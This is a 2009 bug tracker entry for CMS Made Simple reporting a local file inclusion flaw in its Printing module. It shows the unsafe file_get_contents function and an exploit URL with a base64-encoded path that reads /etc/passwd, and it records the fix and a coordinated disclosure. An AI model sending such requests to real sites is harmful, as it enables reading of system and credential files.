CMS MADE SIMPLE FORGE

CMS Made Simple Core

Back to List

[#3798] Local File Inclusion Printing Module

Created By: SQ (r00t_ati)

Date Submitted: Wed Jul 29 09:19:09 -0400 2009

Assigned To: Robert Campbell (calguy1000)

Version: 1.6

CMSMS Version: None

Severity: Critical

Resolution: Fixed

State: Closed

Summary:

Local File Inclusion Printing Module

Detailed Description:

Vulnerability:
============================================
function GetURLContent($url) {
    $content=file_get_contents($url);
    return $content;
  }
=============================================

Exploit :
====================================================
http://[site]/[cms_path]/modules/Printing/output.php?url=L2V0Yy9wYXNzd2Q=
====================================================
L2V0Yy9wYXNzd2Q= <--- /etc/passwd in base64

History

Date: 2009-07-29 10:29
Posted By: Robert Campbell (calguy1000)

Fixed in SVN... will be released today

Date: 2009-07-29 10:54
Posted By: SQ (r00t_ati)

Thanks Robert, nice job.
I'll make it public 7 day after your new release.

Regards from Italy.

Date: 2009-08-17 09:42
Posted By: Ronny Krijt (ronnyk)

New version of core was released.

Updated: 2009-08-17 09:42
state: Open => Closed

Updated: 2009-07-29 10:29
resolution_id: 10 => 7
assigned_to_id: 100 => 106

Updated: 2009-07-29 09:23
resolution_id: => 10

CMSMS | CMS Made Simple

CMS MADE SIMPLE FORGE

CMS Made Simple Core

[#3798] Local File Inclusion Printing Module

History